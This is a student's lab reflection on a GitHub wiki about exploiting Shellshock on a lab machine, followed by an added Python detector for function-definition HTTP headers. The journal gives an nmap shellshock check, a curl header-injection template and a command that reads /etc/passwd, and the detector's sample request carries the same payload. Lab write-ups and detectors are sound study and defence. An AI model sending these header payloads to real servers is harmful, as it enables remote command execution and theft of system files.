Activity 4.1 Exploiting Cupcake Reflection Journal - Foren-Ken/tech-journal GitHub Wiki

The largest issue I encountered during this lab was applying the Shellshock vulnerability onto the HTTP header. I somewhat understood how it worked normally, but the implementation seemed to be counterintuitive. The following command is how we checked for the vulnerability:

```
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" [IP ADDRESS]
```

I do hope we use a similar `--script` flag to discover more in the class.

When it came down to the basic syntax to interact with the server:

```
curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' http://host/[Vulnerable Area]
```

I don't understand why multiple options are chosen, but I do understand they're necessary to work.

  1. `-s` passes an argument into a parameter, but I am unsure why it is used in this.
  2. `echo ; echo ;` I didn't think echoes would be necessary, but it seems to act like a buffer, though I am unsure if that's true.
  3. `/bin/echo "$(< /etc/passwd)"` is one of the multiple `[location of command] [argument(s)]` I utilized, but I don't understand why echo requires a very unorthodox input to show the value of passwd.
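
A defensive view of the header used above, as an added example that is not part of the original journal: a CGI server exports each request header into an environment variable, so a header value that begins with `() {` is what a vulnerable bash parses as a function definition followed by a trailing command. The sample request is constructed, and the function names are illustrative.

```python
import re

# A header value that an unpatched bash treats as a function definition:
# optional whitespace, "()", optional whitespace, "{ ... }", then a trailer.
FUNC_PREFIX = re.compile(
    r"^\s*\(\)\s*\{(?P<body>.*?)\}\s*;?\s*(?P<trailer>.*)$", re.S
)

def cgi_env_name(header):
    """CGI convention: header 'X-Foo' is exported to the script as HTTP_X_FOO."""
    return "HTTP_" + header.upper().replace("-", "_")

def parse_headers(raw_request):
    """Return [(name, value)] from the head of a raw HTTP/1.x request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def find_shellshock_headers(raw_request):
    """Flag headers whose value starts with a bash function definition."""
    findings = []
    for name, value in parse_headers(raw_request):
        m = FUNC_PREFIX.match(value)
        if m:
            findings.append({
                "header": name,
                "env": cgi_env_name(name),
                # Text after the function body: what bash would go on to run.
                "trailer": m.group("trailer").strip(),
            })
    return findings

# Constructed sample request (not captured traffic).
SAMPLE = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: host\r\n"
    "User-Agent: curl/8.0\r\n"
    "X-Note: retry() { later }\r\n"  # "() {" not at the start: not flagged
    "Test: () { :; }; echo ; echo ; /usr/bin/whoami\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for finding in find_shellshock_headers(SAMPLE):
        print(finding)
```

Matching is anchored to the start of the header value, so the `X-Note` header in the sample is not reported.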